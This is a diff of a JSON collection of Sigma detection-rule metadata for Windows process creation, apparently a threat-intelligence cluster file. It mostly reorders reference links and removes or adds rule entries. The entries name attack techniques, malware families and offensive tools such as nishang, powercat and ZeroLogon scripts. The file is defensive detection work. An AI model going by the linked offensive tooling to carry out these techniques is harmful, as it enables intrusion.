- "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
+ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml"
],
"tags": [
@@ -71104,8 +68118,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
"https://securityxploded.com/",
+ "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml"
],
"tags": [
@@ -71239,10 +68253,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://youtu.be/5mqid-7zp8k?t=2481",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://youtu.be/5mqid-7zp8k?t=2481",
"https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml"
],
"tags": [
@@ -71266,8 +68280,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"
],
"tags": [
@@ -71402,9 +68416,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/winsiderss/systeminformer",
"https://processhacker.sourceforge.io/",
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
- "https://github.com/winsiderss/systeminformer",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml"
],
"tags": "No established tags"
@@ -71426,8 +68440,8 @@
"logsource.product": "windows",
"refs": [
"https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml"
],
"tags": [
@@ -71460,8 +68474,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md",
+ "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml"
],
"tags": [
@@ -71580,40 +68594,6 @@
"uuid": "0afbd410-de03-4078-8491-f132303cb67d",
"value": "Renamed NetSupport RAT Execution"
},
- {
- "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/12/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_ta505_dropper.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/ForensicITGuy/status/1334734244120309760",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0092",
- "attack.t1106"
- ]
- },
- "related": [
- {
- "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4",
- "value": "TA505 Dropper Load Pattern"
- },
{
"description": "Detects the execution of msiexec.exe from an uncommon directory",
"meta": {
@@ -71660,8 +68640,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
+ "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml"
],
"tags": [
@@ -71681,58 +68661,6 @@
"uuid": "208748f7-881d-47ac-a29c-07ea84bf691d",
"value": "Suspicious Outlook Child Process"
},
- {
- "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_greenbug_may20.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml"
- ],
- "tags": [
- "attack.g0049",
- "attack.execution",
- "attack.t1059.001",
- "attack.command_and_control",
- "attack.t1105",
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3711eee4-a808-4849-8a14-faf733da3612",
- "value": "Greenbug Espionage Group Indicators"
- },
{
"description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)",
"meta": {
@@ -71746,9 +68674,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
"https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml"
],
"tags": [
@@ -71781,9 +68709,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
"https://twitter.com/_st0pp3r_/status/1583914515996897281",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml"
],
"tags": [
@@ -71816,8 +68744,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet",
"https://twitter.com/kmkz_security/status/1220694202301976576",
+ "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml"
],
"tags": [
@@ -71884,8 +68812,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.exploit-db.com/exploits/37525",
"https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer",
+ "https://www.exploit-db.com/exploits/37525",
"https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml"
],
@@ -72003,8 +68931,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/med0x2e/status/1520402518685200384",
"https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
+ "https://twitter.com/med0x2e/status/1520402518685200384",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml"
],
"tags": [
@@ -72025,6 +68953,30 @@
"uuid": "bb76d96b-821c-47cf-944b-7ce377864492",
"value": "Suspicious NTLM Authentication on the Printer Spooler Service"
},
+ {
+ "description": "Detects file download using curl.exe",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_curl_download_susp_file_sharing_domains.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "56454143-524f-49fb-b1c6-3fb8b1ad41fb",
+ "value": "Suspicious File Download From File Sharing Domain Via Curl.EXE"
+ },
{
"description": "Detects the Installation of a Exchange Transport Agent",
"meta": {
@@ -72257,10 +69209,10 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services",
- "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/",
- "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe",
"https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6",
+ "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/",
+ "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"
],
"tags": [
@@ -72368,11 +69320,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg",
+ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
"https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml"
],
"tags": [
@@ -72405,8 +69357,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
"https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
"https://abuse.io/lockergoga.txt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml"
],
@@ -72436,50 +69388,6 @@
"uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6",
"value": "Disable of ETW Trace"
},
- {
- "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.",
- "meta": {
- "author": "Tim Burrell",
- "creation_date": "2020/02/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_gallium_iocs.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_iocs.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.command_and_control",
- "attack.t1212",
- "attack.t1071",
- "attack.g0093"
- ]
- },
- "related": [
- {
- "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "440a56bf-7873-4439-940a-1c8a671073c2",
- "value": "GALLIUM IOCs"
- },
{
"description": "Detects command line parameters or strings often used by crypto miners",
"meta": {
@@ -72594,9 +69502,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://redcanary.com/blog/raspberry-robin/",
"https://github.com/SigmaHQ/sigma/issues/1009",
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml"
],
"tags": [
@@ -72677,40 +69585,27 @@
"value": "PUA - CleanWipe Execution"
},
{
- "description": "Detects DarkSide Ransomware and helpers",
+ "description": "Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/14",
- "falsepositive": [
- "Unknown",
- "UAC bypass method used by other malware"
- ],
- "filename": "proc_creation_win_malware_darkside_ransomware.yml",
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_mssql_veaam_susp_child_processes.yml",
"level": "critical",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2",
- "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_darkside_ransomware.yml"
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml"
],
"tags": [
- "attack.execution",
- "attack.t1204"
+ "attack.initial_access",
+ "attack.persistence",
+ "attack.privilege_escalation"
]
},
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c",
- "value": "DarkSide Ransomware Pattern"
+ "uuid": "d55b793d-f847-4eea-b59a-5ab09908ac90",
+ "value": "Suspicious Child Process Of Veeam Dabatase"
},
{
"description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.",
@@ -72799,8 +69694,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml"
],
"tags": [
@@ -72903,8 +69798,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/binderlabs/DirCreate2System",
- "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
"https://www.echotrail.io/insights/search/wermgr.exe",
+ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml"
],
"tags": "No established tags"
@@ -72912,41 +69807,6 @@
"uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e",
"value": "Suspicious WERMGR Process Patterns"
},
- {
- "description": "Detects Archer malware invocation via rundll32",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_fireball.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/",
- "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_fireball.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d",
- "value": "Fireball Archer Install"
- },
{
"description": "Detects suspicious PowerShell invocation command parameters",
"meta": {
@@ -72983,8 +69843,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml"
],
"tags": [
@@ -73196,42 +70056,6 @@
"uuid": "83865853-59aa-449e-9600-74b9d89a6d6e",
"value": "Audio Capture via SoundRecorder"
},
- {
- "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/09/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_formbook.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/",
- "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer",
- "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/",
- "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b",
- "value": "Formbook Process Creation"
- },
{
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
"meta": {
@@ -73279,19 +70103,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml"
],
@@ -73415,8 +70242,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://twitter.com/_st0pp3r_/status/1583914244344799235",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml"
],
@@ -73526,8 +70353,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml"
],
"tags": [
@@ -73577,8 +70404,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
"https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml"
],
"tags": [
@@ -73901,9 +70728,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"
],
"tags": [
@@ -74039,8 +70866,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.echotrail.io/insights/search/ilasm.exe",
"https://lolbas-project.github.io/lolbas/Binaries/Ilasm/",
+ "https://www.echotrail.io/insights/search/ilasm.exe",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"
],
"tags": [
@@ -74073,8 +70900,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
"https://twitter.com/tccontre18/status/1480950986650832903",
+ "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_pattern.yml"
],
"tags": [
@@ -74215,8 +71042,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ShadowChasing1/status/1552595370961944576",
"https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
+ "https://twitter.com/ShadowChasing1/status/1552595370961944576",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml"
],
"tags": [
@@ -74283,8 +71110,8 @@
"logsource.product": "windows",
"refs": [
"https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
